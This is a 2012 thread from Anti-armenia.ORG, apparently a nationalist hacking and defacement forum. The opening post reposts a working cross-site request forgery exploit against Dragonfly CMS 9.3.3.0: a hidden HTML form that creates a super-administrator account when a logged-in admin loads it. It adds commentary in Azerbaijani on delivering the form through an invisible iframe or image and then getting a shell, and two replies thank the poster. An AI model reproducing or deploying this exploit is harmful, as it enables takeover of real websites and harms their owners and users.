Anti-armenia.ORG - Forumlar - Dragonfly CMS 9.3.3.0 Cross Site Request Forgery



Istifadəçi
     2012-03-27 23:50 GMT                 

BlackMinD


Pr0grammer
Mesaj Sayı : 1677
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   62  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : KARABAKH IS AZERBAIJAN!
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Kod:
=================================================================================================
Vulnerable Software: Dragonfly CMS v9.3.3.0
Downloaded and tested from: http://dragonflycms.org/Downloads/get=28/

Fileinfo:dragonflycms.org   Dragonfly9.3.3.0.zip   2.25 MB   70aea682301253637844d7caa10c3ed0
=================================================================================================
Vuln Desc:
Dragonfly CMS v9.3.3.0 suffers from CROSS SITE REQUEST FORGERY vulnerability.
Will Pwn: If currently logged administrator visits malicious LINK which contains POC code(see below)

New Super Admin will be created on remote site with this credentials:

Username: MySecRet1
Email: MySecRet1@localhost.tld
Password: MySecRet1

@Print Screen on Success Pwn: http://s019.radikal.ru/i635/1203/f1/03e535781d5f.png
=================================================================================================

/*
Tested on: Windows XP SP2 (32 bit)
Apache: 2.2.21.0
PHP Version: 5.2.17.17
mysql> select version()
    -> ;
+-----------+
| version() |
+-----------+
| 5.5.21    |
+-----------+

Successfully exploitates.
*/


===================Dragonfly CMS v9.3.3.0 CSRF ADD SUPER ADMIN Proof Of Concept Exploit=====================
<html>
<head>
<title>Dragonfly CMS v9.3.3.0 CSRF ADD SUPER ADMIN Proof Of Concept Exploit</title>
</head>

<body



<form method="post" autocomplete="off" action="http://CHANGE_TO_RTARGET/admin.php?op=admins&mode=add" enctype="multipart/form-data" accept-charset="utf-8">

<!-- User name -->
<input type="hidden" name="add_aid" id="add_aid" size="31" maxlength="30" value="MySecRet1"/>


<!-- Email Address -->
<input type="hidden" name="add_email" id="add_email" size="31" maxlength="60" value="MySecRet1@localhost.tld" />

<!-- checked (for create super admin)-->
<input type="hidden" name="radminsuper" id="radminsuper" value="1" checked="checked" />


<!-- Password -->
<input type="hidden" name="add_pwd" id="add_pwd" size="20" maxlength="40" value="MySecRet1" />
</form>

</body>
<!--
On successfully Pwn will be created:
Username: MySecRet1
Email: MySecRet1@localhost.tld
Password: MySecRet1
CTRL+F  http://CHANGE_TO_RTARGET change to remote target.
-->
</html>
===================================EOF==========================================================

/AkaStep ^_^
GreetZ to all: packetstormsecurity.*  ,securityfocus.com,security.nnov.ru

+--------------+
|     Live     |
+--------------+
|   1331522784 |
+--------------+


http://packetstormsecurity.org/files/110702/Dragonfly-CMS-9.3.3.0-Cross-Site-Request-Forgery.html
Bu vulnerability-nin mahiyyəti odur ki CSRF vasitəsilə adminə link verirsiniz forumda hansıki yuxarıdakı exploitdir.
Məsələn adi <img ya invisible iframe Admin linkə klikləsə yaxud həmin "şəkil" load olan kimi admindən xəbərsiz yeni bir admin əlavə ediləcək)
Sonrası da bəllidirki adminkaya girib şellənmək qalır.
Bu Vulnerability Dragonfly CMS 9.3.3.0 -a qədər və bu da daxil olmaqla işləkdir. 9.3.3.0 dan sonrası versiya artıq fixlidir çünki 0day etmişəm.
Bu Vuln-nun axmaq cəhəti odurki adamın heç ruhu incimir yeni admin adminkaya əlavə ediləndə.
Bir qeyd də edim 99% web applicationlar bu tipli vulberability-dən əziyyət çəkirlər çünki webmasterlər başa düşmürlər onun mahiyyətini+ digər üstün cəhət https belə xilas etmir bundan.

Ana VƏTƏN!
Anti-armenia.ORG
     
 

Istifadəçi
     2012-03-27 23:56 GMT                 

K0K4!N


İstifadəçi
Mesaj Sayı : 115
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   1  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş : 35
Mesaj :

Mövzunu Paylaş!


Təşhəkkürlər Qaqa

Anti-armenia.ORG
     
 

Istifadəçi
     2012-03-28 12:57 GMT                 

Ferid23


Admin
Mesaj Sayı : 1875
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   45  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Anti-armenia.ORG
Ölkə :
Məslək : Programmer & Defacer
Yaş : 12
Mesaj :

Mövzunu Paylaş!


Super! Təşəkkür!

AZ Domaini İhbar Hattı (Azərbaycan saytlarında olan boşluqları bizə bildirin): http://anti-armenia.org/forums.php?m=posts&q=572
Qaydalar (Saytın qayda-qanunlarını oxuyaraq əməl edin)
Anti-armenia.ORG
     
 

 
Site By: Ferid23 | Designed: MCH & FERID23  | Site: Anti-armenia.ORG